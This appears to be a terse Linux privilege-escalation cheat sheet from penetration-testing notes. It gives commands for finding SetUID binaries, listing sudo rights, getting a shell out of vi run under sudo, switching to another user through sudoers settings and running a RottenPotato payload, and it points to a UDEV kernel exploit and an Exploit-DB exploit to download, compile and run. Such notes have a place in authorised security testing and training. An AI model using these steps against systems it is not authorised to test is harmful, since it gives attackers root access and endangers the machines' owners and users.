Table of Contents

• Linux
  • Find SetUID Files
  • Check User Privileges
  • Interactive Programs with SUDO Privilege
  • RottenPotato
  • Kernel 2.6
  • LXD LXC Privilege Escalation
  • Priv Escalation Through Sudoers Conf
  • Exploit Suggester
  • Rational Love
  • VNC

Linux

Find SetUID Files

find / -perm -4000 -type f 2>/dev/null

Check User Privileges

sudo -l -l

Interactive Programs with SUDO Privilege

sudo vi <filename> -> :!/bin/sh

RottenPotato

Download Here

jp.exe -t * -p <bat-payload> -l <random-number[1337|]>

Kernel 2.6

Local Privilege Escalation with UDEV exploit.

exploits/linux/local/8572.c

LXD LXC Privilege Escalation

• LINK TO EXPLOITS

Priv Escalation Through Sudoers Conf

If the initial user can execute command with sudo, and another user can execute any command without password

sudo -u <other-user> bash

Exploit Suggester

• Linux Exploit Suggester script

Rational Love

# result can be found by linux exploit suggester
ubuntu=16.04.3(glibc 2.23-0ubuntu9)

# just download the file, compile and execute
https://www.exploit-db.com/exploits/43775

VNC

vncviewer -passwd <pass-file> host::port